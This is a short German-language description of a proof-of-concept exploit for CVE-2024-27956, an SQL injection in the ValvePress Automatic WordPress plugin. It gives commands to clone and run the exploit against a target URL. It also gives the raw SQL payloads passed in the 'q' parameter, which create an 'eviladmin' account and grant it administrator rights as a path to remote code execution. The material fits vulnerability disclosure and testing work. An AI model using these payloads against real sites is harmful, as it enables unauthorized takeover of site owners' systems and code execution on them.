
Proof-of-concept-Exploit für CVE-2024-27956, eine SQL-Injection im ValvePress Automatic WordPress-Plugin. Erstellt einen Admin-Benutzer und ermöglicht Remote-Code-Ausführung über nicht bereinigte Eingaben.
Ein PoC für CVE-2024-27956, eine SQL-Injection im ValvePress Automatic Plugin. Dieser PoC nutzt die Schwachstelle aus, indem er einen Benutzer auf dem Zielsystem erstellt und diesem Administratorrechte verleiht. Als Administrator in WordPress kann man Remote Code Execution erreichen.
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')
Administratorrechte vergeben:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
Im q-Parameter können wir unsere gesamte Query übergeben, die dann ausgeführt wird.
Die Benutzereingabe wird direkt ohne jegliche Einschränkung oder Bereinigung ausgeführt.